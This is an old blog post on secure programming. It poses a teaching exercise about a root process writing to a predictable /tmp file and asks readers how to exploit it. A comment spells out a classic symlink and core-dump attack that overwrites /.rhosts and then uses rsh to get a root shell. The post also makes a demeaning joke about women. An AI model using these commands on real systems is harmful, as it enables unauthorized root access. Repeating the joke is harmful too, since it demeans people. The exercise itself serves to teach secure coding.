Secure Programming

With the FireWalls & a mammoth lock on gate, do you think the fort is secure? No. The walls are weak and the daemons standing on gates are gullible. We are here to learn breaking the walls and tricking the deamons, and to learn making them secure. It not about certification bullshit.It's just about CODE. Lets start the drill.
"If you know the enemy and know yourself, your victory will not stand in doubt; if you know Heaven and know Earth, you may make your victory complete" -Art of War

Friday, April 15, 2005

The temporary one!

void main()
{
FILE *fh = fopen("/tmp/ABC_my_junk_spot", "w+");
fprintf(fh, "hello..what are you looking at?");
fclose(fh);
}

Find out what is wrong with this piece of code?
How would you exploit this to gain root access if this code runs as root?

PS: The bar girls are like /tmp because
1. They are public property 2.They talk too much

4 comments:

SG said...: This comment has been removed by a blog administrator.; 3:00 AM
SG said...: Very true.
It may be a local compromise but not a remote one.

--Alpha0; 3:01 AM
SG said...: I dont think we can control the behavior of printf.

You remember an old trick:
(Earlier all cores dumped by applications having suid as root were owned by root.)

$ln -s /.rhosts core
$BOB42="

+ +

"
$export BOB42

Now get the core dumped by killing some suid root process for example 'ping'.
And here is your chocolate:
$rsh -l root localhost /bin/sh -i

Njoy.; 9:29 PM
SG said...: In the similar manner you can exploit the code given in problem.; 9:31 PM